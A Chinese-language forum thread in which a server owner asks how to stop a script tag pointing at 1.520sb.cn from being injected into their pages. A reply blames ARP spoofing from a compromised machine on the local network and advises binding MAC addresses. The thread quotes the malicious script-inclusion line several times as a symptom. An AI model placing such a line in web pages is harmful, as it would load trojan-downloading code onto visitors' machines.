520SB病毒如何预防

flyingsky321

这两天我的电脑一浏览某些网站都会被我的杀软查到一个恶意代码<script src=http://1.520sb.cn/1.js></script>


服务器上的网页,只要一开打,就会自动被添加

<script src=http://1.520sb.cn/1.js></script>  

在源代码里,但是服务器上的文件却没有被修改.....


使用空白的asp文件进行测试,也是一样,浏览时有<script src=http://1.520sb.cn/1.js></script>  ,但是文件里却还是空白的.

<script src=http://1.520sb.cn/1.js></script>  这个代码会下载木马图片


不知道,怎么解决这个问题,服务器已经都不敢开了啊............

taong

把服务器绑定MAC就可以了。

这是arpsniffer的一种，数据包在送出到达网关的过程中被劫持 主要原因是内网有计算机被控制，通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性，所以劫持的成功率不一样。
呵呵。客户有次遇到过，最后原因就是这个，重装系统都没用，找出那个计算机是关键

flyingsky321

呵呵 谢谢 大哥了